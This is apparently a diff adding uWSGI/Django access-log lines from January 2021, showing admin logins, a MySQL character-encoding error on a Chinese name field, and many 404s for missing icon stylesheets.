+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1")
+[pid: 11057|app: 0|req: 1223/1524] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 09:17:05 2021] POST /kind-manage/ => generated 207096 bytes in 140 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1224/1525] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 09:17:06 2021] GET /kind-manage/? => generated 7366 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 37312] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1225/1526] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1226/1527] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1227/1528] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1228/1529] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1230/1531] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 55 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1229/1530] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1231/1532] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:17:06 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1232/1533] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:17:06 2021] GET /static/css/spinners.css => generated 3516 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1233/1534] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:17:06 2021] GET /static/css/animate.css => generated 3513 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1234/1535] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:20:51 2021] GET /kind-manage/? => generated 0 bytes in 17 msecs (HTTP/1.1 302) 8 headers in 301 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1235/1536] 219.228.146.156 () {42 vars in 912 bytes} [Thu Jan 14 09:20:51 2021] GET /my-admin => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1236/1537] 219.228.146.156 () {42 vars in 914 bytes} [Thu Jan 14 09:20:51 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1538] 219.228.146.156 () {40 vars in 824 bytes} [Thu Jan 14 09:20:51 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1539] 219.228.146.156 () {40 vars in 846 bytes} [Thu Jan 14 09:20:51 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1540] 219.228.146.156 () {40 vars in 828 bytes} [Thu Jan 14 09:20:51 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1541] 219.228.146.156 () {40 vars in 826 bytes} [Thu Jan 14 09:20:51 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1542] 219.228.146.156 () {40 vars in 832 bytes} [Thu Jan 14 09:20:51 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1543] 219.228.146.156 () {40 vars in 807 bytes} [Thu Jan 14 09:20:51 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1544] 219.228.146.156 () {40 vars in 805 bytes} [Thu Jan 14 09:20:52 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1545] 219.228.146.156 () {40 vars in 823 bytes} [Thu Jan 14 09:20:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1546] 219.228.146.156 () {40 vars in 821 bytes} [Thu Jan 14 09:20:52 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1547] 219.228.146.156 () {40 vars in 813 bytes} [Thu Jan 14 09:20:52 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1548] 219.228.146.156 () {40 vars in 864 bytes} [Thu Jan 14 09:20:52 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 1237/1549] 219.228.146.156 () {48 vars in 974 bytes} [Thu Jan 14 09:20:58 2021] POST /my-admin/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1239/1550] 219.228.146.156 () {48 vars in 1018 bytes} [Thu Jan 14 09:21:00 2021] POST /my-admin/ => generated 27 bytes in 25 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1239/1551] 219.228.146.156 () {40 vars in 928 bytes} [Thu Jan 14 09:21:00 2021] GET /admin-home/ => generated 6515 bytes in 22 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1240/1552] 219.228.146.156 () {40 vars in 928 bytes} [Thu Jan 14 09:21:01 2021] GET /admin-home/ => generated 6515 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1241/1553] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1242/1554] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1243/1555] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:21:01 2021] GET /static/css/spinners.css => generated 3516 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1244/1556] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1245/1557] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1246/1558] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 41 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1247/1559] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1248/1560] 219.228.146.156 () {38 vars in 872 bytes} [Thu Jan 14 09:21:01 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1249/1561] 219.228.146.156 () {38 vars in 818 bytes} [Thu Jan 14 09:21:01 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1250/1562] 219.228.146.156 () {40 vars in 931 bytes} [Thu Jan 14 09:21:09 2021] GET /kind-manage/ => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1251/1563] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1252/1564] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1253/1565] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1254/1566] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1255/1567] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1256/1568] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1257/1569] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 09:21:09 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1258/1570] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 09:21:09 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1259/1571] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 09:21:09 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1260/1572] 219.228.146.156 () {48 vars in 1026 bytes} [Thu Jan 14 09:21:18 2021] POST /kind-manage/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1261/1573] 219.228.146.156 () {40 vars in 932 bytes} [Thu Jan 14 09:21:19 2021] GET /kind-manage/ => generated 7368 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1262/1574] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1263/1575] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1264/1576] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1265/1577] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1266/1578] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1267/1579] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1268/1580] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 09:21:19 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1269/1581] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 09:21:19 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1270/1582] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 09:21:19 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1271/1583] 180.160.72.163 () {38 vars in 826 bytes} [Thu Jan 14 09:22:47 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1584] 180.160.72.163 () {40 vars in 815 bytes} [Thu Jan 14 09:22:47 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1585] 180.160.72.163 () {40 vars in 837 bytes} [Thu Jan 14 09:22:47 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1586] 180.160.72.163 () {40 vars in 819 bytes} [Thu Jan 14 09:22:47 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1587] 180.160.72.163 () {40 vars in 823 bytes} [Thu Jan 14 09:22:47 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1588] 180.160.72.163 () {40 vars in 817 bytes} [Thu Jan 14 09:22:47 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1589] 180.160.72.163 () {40 vars in 798 bytes} [Thu Jan 14 09:22:47 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1590] 180.160.72.163 () {40 vars in 814 bytes} [Thu Jan 14 09:22:47 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1591] 180.160.72.163 () {40 vars in 804 bytes} [Thu Jan 14 09:22:47 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1592] 180.160.72.163 () {40 vars in 812 bytes} [Thu Jan 14 09:22:47 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1593] 180.160.72.163 () {40 vars in 796 bytes} [Thu Jan 14 09:22:47 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1594] 180.160.72.163 () {40 vars in 869 bytes} [Thu Jan 14 09:22:47 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: 0|req: 1272/1595] 180.160.72.163 () {48 vars in 959 bytes} [Thu Jan 14 09:23:01 2021] POST /login/ => generated 27 bytes in 37 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1273/1596] 180.160.72.163 () {40 vars in 874 bytes} [Thu Jan 14 09:23:01 2021] GET /home/ => generated 7720 bytes in 15 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1274/1597] 180.160.72.163 () {40 vars in 875 bytes} [Thu Jan 14 09:23:50 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1275/1598] 180.160.72.163 () {40 vars in 882 bytes} [Thu Jan 14 09:23:51 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1276/1599] 180.160.72.163 () {48 vars in 968 bytes} [Thu Jan 14 09:24:02 2021] POST /my-admin/ => generated 27 bytes in 31 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1277/1600] 180.160.72.163 () {40 vars in 889 bytes} [Thu Jan 14 09:24:02 2021] GET /admin-home/ => generated 6515 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1601] 180.160.72.163 () {40 vars in 878 bytes} [Thu Jan 14 09:24:02 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1602] 180.160.72.163 () {40 vars in 812 bytes} [Thu Jan 14 09:24:02 2021] GET /static/css/style.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1603] 180.160.72.163 () {40 vars in 841 bytes} [Thu Jan 14 09:24:02 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1604] 180.160.72.163 () {40 vars in 824 bytes} [Thu Jan 14 09:24:02 2021] GET /static/css/colors/blue.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1605] 180.160.72.163 () {40 vars in 853 bytes} [Thu Jan 14 09:24:02 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1606] 180.160.72.163 () {40 vars in 859 bytes} [Thu Jan 14 09:24:02 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 11057|app: -1|req: -1/1607] 180.160.72.163 () {40 vars in 817 bytes} [Thu Jan 14 09:24:02 2021] GET /static/js/jquery.slimscroll.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1278/1608] 180.160.72.163 () {38 vars in 848 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1279/1609] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1280/1610] 180.160.72.163 () {38 vars in 824 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1281/1611] 180.160.72.163 () {38 vars in 880 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1282/1612] 180.160.72.163 () {38 vars in 772 bytes} [Thu Jan 14 09:24:02 2021] GET /static/css/spinners.css => generated 3516 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1283/1613] 180.160.72.163 () {38 vars in 804 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 73 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1284/1614] 180.160.72.163 () {38 vars in 770 bytes} [Thu Jan 14 09:24:02 2021] GET /static/css/animate.css => generated 3513 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1285/1615] 180.160.72.163 () {38 vars in 840 bytes} [Thu Jan 14 09:24:02 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: -1|req: -1/1616] 180.160.72.163 () {40 vars in 793 bytes} [Thu Jan 14 09:24:03 2021] GET /static/js/waves.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1286/1617] 180.160.72.163 () {38 vars in 836 bytes} [Thu Jan 14 09:24:03 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 15 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: -1|req: -1/1618] 180.160.72.163 () {40 vars in 805 bytes} [Thu Jan 14 09:24:03 2021] GET /static/js/sidebarmenu.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1619] 180.160.72.163 () {40 vars in 881 bytes} [Thu Jan 14 09:24:03 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1620] 180.160.72.163 () {40 vars in 803 bytes} [Thu Jan 14 09:24:03 2021] GET /static/js/custom.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: -1|req: -1/1621] 180.160.72.163 () {40 vars in 877 bytes} [Thu Jan 14 09:24:03 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 11057|app: 0|req: 1287/1622] 180.160.72.163 () {40 vars in 893 bytes} [Thu Jan 14 09:24:04 2021] GET /announcement => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 182 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1288/1623] 180.160.72.163 () {40 vars in 895 bytes} [Thu Jan 14 09:24:04 2021] GET /announcement/ => generated 7421 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
